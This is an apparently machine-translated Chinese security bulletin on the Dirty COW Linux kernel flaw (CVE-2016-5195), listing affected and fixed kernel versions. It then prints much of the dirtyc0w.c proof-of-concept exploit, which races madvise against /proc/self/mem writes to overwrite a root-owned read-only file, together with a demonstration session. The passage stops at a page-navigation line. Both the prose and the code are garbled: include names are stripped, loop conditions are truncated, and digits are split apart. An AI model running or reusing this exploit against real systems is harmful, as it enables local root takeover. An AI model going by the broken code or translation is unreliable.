Vulnerability early warning: the Linux kernel 9-year old“dirty cow”0day vulnerabilities-vulnerability warning-the black bar safety net

2016-10-21T00:00:00
ID MYHACK58:62201680419
Type myhack58
Reporter 佚名
Modified 2016-10-21T00:00:00

Description

This guy named Dirty COW, that is a dirty cow vulnerability exists in the Linux kernel has been there for 9 years, also said that the 2 0 0 7 released in Linux kernel version already exists this vulnerability. The Linux kernel team had to fix. ! Vulnerability ID: CVE-2 0 1 6-5 1 9 5 Vulnerability name: Dirty COW Vulnerability to harm: Low-privileged user exploit the vulnerability in many Linux systems on the local provide the right Affect range: Linux kernel >= 2.6.22 for 2 0 0 7 issued in the year 1 0 May 1 8, only repair Vulnerability overview: The vulnerability specifically, the Linux kernel's memory subsystem in the processing of the write replication, copy-on-write, COW when it produces a race condition race condition it. A malicious user may exploit this vulnerability to obtain elevated permissions to read-only memory mapped for write access. A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.) Competitive conditions, refers to the task execution order exception may cause the application to crash, or make the attacker take advantage of, and further execute the other code. Using this vulnerability, an attacker may in its target system to elevate privileges, and even possible to obtain root privileges. According to the official release of the patch information, this problem can be traced back to the 2 0 0 7 published in the Linux kernel. Now there is no any evidence that the 2 0 0 7 years after hackers took advantage of this vulnerability. However, security expert Phil Oester called the discovery an attacker use the vulnerability to deploy attack, and to Red Hat informed of the recent attacks. Repair method: For the Linux kernel maintenance Greg Kroah-Hartman announced for Linux 4.8, a 4. 7 and 4. 4 LTS kernel series maintenance update after update for Linux kernel 4.8.3 and 4.7. 9 and 4. 4. 2 6 LTS, the Fix for the vulnerability. Currently the new version has logged in the various GNU/Linux distributions version of the library, including the Arch Linux testing, the Solus and all supported versions of Ubuntu. Debian developers the day before yesterday also announced the stable version of Debian GNU/Linux 8 “Jessei”series of the kernel important update-this update total fixes 4 Linux kernel security vulnerability, which also includes a dirty cow. Each of theoperating systemthe vendor should immediately download the Linux kernel 4.8.3, Linux kernel 4.7.9 and Linux kernel 4.4.26 LTS, to provide users with stable channel update. Software developers can be through the https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 re-compile Linux to fix this vulnerability. Vulnerability POC of: /*

################# dirtyc0w. c#######################

$ sudo-s

echo this is not a test > foo

chmod 0 4 0 4 foo

$ ls-lah foo -r-----r-- 1 root root 1 9 Oct 2 0 1 5:2 3 foo $ cat foo this is not a test $ gcc-lpthread dirtyc0w. c-o dirtyc0w $ ./ dirtyc0w foo m00000000000000000 mmap 5 6 1 2 3 0 0 0 madvise 0 procselfmem 1 8 0 0 0 0 0 0 0 0 $ cat foo m00000000000000000

################# dirtyc0w. c#######################

*/

include

include

include

include

include

void map; int f; struct stat st; char name;

void madviseThread(void arg) { char str; str=(char)arg; int i,c=0; for(i=0;i { / You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661 > This is achieved by racing the madvise(MADV_DONTNEED) system call > while having the page of the executable mmapped in memory. / c+=madvise(map,1 0 0,MADV_DONTNEED); } printf("madvise %d\n\n",c); }

void procselfmemThread(void arg) { char str; str=(char)arg; / You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16 > The in the wild exploit we are aware of doesn't work on Red Hat > Enterprise Linux 5 and 6 out of the box because on one side of > the race it writes to /proc/self/mem, but /proc/self/mem is not > writable on Red Hat Enterprise Linux 5 and 6. / int f=open("/proc/self/mem",O_RDWR); int i,c=0; for(i=0;i / You have to reset the file pointer to the memory position. / lseek(f,map,SEEK_SET); c+=write(f,str,strlen(str)); } printf("procselfmem %d\n\n", c); }

int main(int argc,char argv[]) { / You have to pass two arguments. File and Contents. / if (argc pthread_t pth1,pth2; / You have to open the file in read only mode. / f=open(argv[1],O_RDONLY); fstat(f,&st); name=argv[1]; / You have to use MAP_PRIVATE for copy-on-write mapping. > Create a private copy-on-write mapping. Updates to the > the mapping are not visible to other processes mapping the same > file, and are not carried through to the underlying file. It > is unspecified whether changes made to the file after the > mmap() call are visible in the mapped region. / / You have to open with PROT_READ. */ map=mmap(NULL,st. st_size,PROT_READ,MAP_PRIVATE,f,0);

[1] [2] next